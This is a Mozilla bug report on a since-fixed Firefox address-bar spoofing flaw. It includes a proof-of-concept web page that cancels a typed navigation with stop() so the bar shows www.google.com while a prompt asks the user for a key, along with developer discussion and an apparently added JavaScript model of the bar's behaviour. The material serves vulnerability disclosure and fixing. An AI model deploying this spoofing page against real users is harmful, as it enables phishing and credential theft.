Closed Bug 725611 Opened 8 years ago Closed 8 years ago

[CAL-2012-0019]Firefox website spoof vulnerability by hook event

Categories

(Firefox :: Address Bar, defect)

10 Branch
x86
Windows 7
defect
Not set

Tracking


VERIFIED FIXED
Firefox 14
Tracking Status
firefox12 --- wontfix
firefox13 + wontfix
firefox14 + verified
firefox-esr10 14+ verified

People

(Reporter: vulnhunt, Assigned: dao)

References

Details

(Whiteboard: [sg:moderate][advisory-tracking+] fixed by bug 724599 )

Attachments

(1 file)

Attached image screen.gif
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Build ID: 20120129021758

Steps to reproduce:

[CAL-2012-0019]Firefox website spoof vulnerability by hook event


1 Affected Products
=================
tested Firefox 10.0(last)


2 Vulnerability Details
=====================
Code Audit Labs of Vulnhunt.com (http://www.vulnhunt.com) has discovered a website spoof vulnerability in Firefox which may trick victims into trusting attack content as trusted website content, like Google in the example.


3 POC:
====
open a html with following content
===================================
<h1 id="msg">type www.google.com in address bar for CAL-2012-0019 by Code Audit Labs of Vulnhunt.com</h1>
<h1 id="spoof"><input id="log"></h1>
<script type="text/javascript">
// Elements are reached through the window's named properties (their ids).
spoof.style.display = 'none';
var done = 0;
var got = 0;
// Fires when the navigation the user typed into the address bar starts.
onbeforeunload = function(ev) {
  done = 1;
  alert('Move your mouse now \nclick "Leave Page" with keyboard');
  return false;
};
onmousemove = function() {
  // Cancels the pending load while the address bar still shows the typed URL.
  stop();
  //console.log(done)
  if (done && !got) {
    msg.style.display = 'none';
    got = prompt('enter your key?');
    if (got) {
      spoof.style.display = 'block';
      log.value = got;
    }
  }
};
</script>
===================================


4 About Code Audit Labs:
=====================
Code Audit Labs secures your software, providing professional services including source
code audit and binary code audit.
Code Audit Labs: "You create value for customers, we protect your value"
http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt

Actual results:

spoof


Expected results:

not spoof
This is basically identical to bug 724599 but with slightly less explicit user interaction... I think we're going to have to revert the urlbar for script-initiated stop()s.
Status: UNCONFIRMED → NEW
Component: Untriaged → Location Bar
Depends on: CVE-2012-1950
Ever confirmed: true
QA Contact: untriaged → location.bar
Whiteboard: [sg:moderate]
The problem with that is that a page can put a stop() on a timeout to keep the user from editing the url bar text...  Can we revert only if we'd started a load from the url bar?
Can we subject stop() to popup abuse controls? As far as I can see, pages only need to use it in response to user interaction.
I kinda like that idea, actually.  It wouldn't be hard to do, for sure....
(In reply to neil@parkwaycc.co.uk from comment #3)
> Can we subject stop() to popup abuse controls? As far as I can see, pages
> only need to use it in response to user interaction.

filed bug 740295
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Whiteboard: [sg:moderate] → [sg:moderate] fixed by bug 724599
Target Milestone: --- → Firefox 14
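Added example, not code from Firefox or from this bug: a small JavaScript model of the address-bar behaviour debated in comments 1 and 2, where a script-initiated stop() reverts the bar only when it cancels a load the user started from the bar. UrlBarModel, its revertScriptStops policy flag and the attacker.example host are assumptions made for illustration.

```javascript
'use strict';
// Added example, not Firefox's code: a model of the address-bar state
// discussed in comments 1 and 2. With policy.revertScriptStops set, a
// script-initiated stop() that cancels a load the user started from the
// bar reverts the bar to the displayed document's URL; without it the
// bar keeps the typed text, as in the PoC.
class UrlBarModel {
  constructor(currentURI, policy) {
    this.currentURI = currentURI; // URL of the document actually shown
    this.value = currentURI;      // text visible in the bar
    this.pendingLoad = null;      // { uri, fromUrlBar } while a load is in flight
    this.policy = policy;
  }
  userTypes(text) { this.value = text; }      // editing only, no load yet
  userCommits() {                             // Enter in the address bar
    this.pendingLoad = { uri: this.value, fromUrlBar: true };
  }
  pageNavigates(uri) {                        // link click, location change
    this.pendingLoad = { uri, fromUrlBar: false };
  }
  // window.stop() called from page script while a load may be pending.
  scriptStop() {
    const load = this.pendingLoad;
    this.pendingLoad = null;
    if (load && load.fromUrlBar && this.policy.revertScriptStops) {
      this.value = this.currentURI; // the bar must describe the shown page
    }
    return this.value;
  }
}

// Constructed scenario mirroring comment 0 (attacker.example is a placeholder):
// the attacker page is shown, the user types www.google.com and presses Enter,
// and the page's mousemove handler calls stop() before the load completes.
function runPoC(policy) {
  const bar = new UrlBarModel("http://attacker.example/", policy);
  bar.userTypes("http://www.google.com/");
  bar.userCommits();
  return bar.scriptStop(); // what the address bar shows afterwards
}

// Comment 2's concern: a stop() fired from a timer while the user is only
// editing the bar (no load pending) must leave the typed text alone.
function runTimerStop(policy) {
  const bar = new UrlBarModel("http://attacker.example/", policy);
  bar.userTypes("http://www.goo");
  return bar.scriptStop();
}
```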
I'm not seeing any difference in behavior with the PoC in comment 0 before and after bug 724599 was fixed.
That said, I don't see the behavior from the attached gif anywhere.
We're already tracking bug 724599 for ESR.
Moving tracking to 13 to make sure these fixes get verified when they land.
(In reply to Al Billings [:abillings] from comment #6)
> I'm not seeing any difference in behavior with the PoC in comment 0 before
> and after bug 724599 was fixed.

I still don't see any difference with Firefox 12 and the post-checkin build with the fix and the attached POC.
This is still being tracked for Firefox 13? Are we taking this on the beta branch (13) or not?
It's too late to land bug 724599 for Firefox 13.
Assignee: nobody → dao
Assigning this bug to Dao so that we can ensure there's someone on the hook to fix this for ESR.
Whiteboard: [sg:moderate] fixed by bug 724599 → [sg:moderate][advisory-tracking+] fixed by bug 724599
Since this is fixed by bug 724599 and that was checked into ESR, is there any reason to not mark this as fixed in status-firefox-esr10 field?
Marking this as verified for 14 and trunk since bug 724599 was verified by me there.
Status: RESOLVED → VERIFIED
Group: core-security
Transitively marking this verified for ESR based on my verification in bug 724599.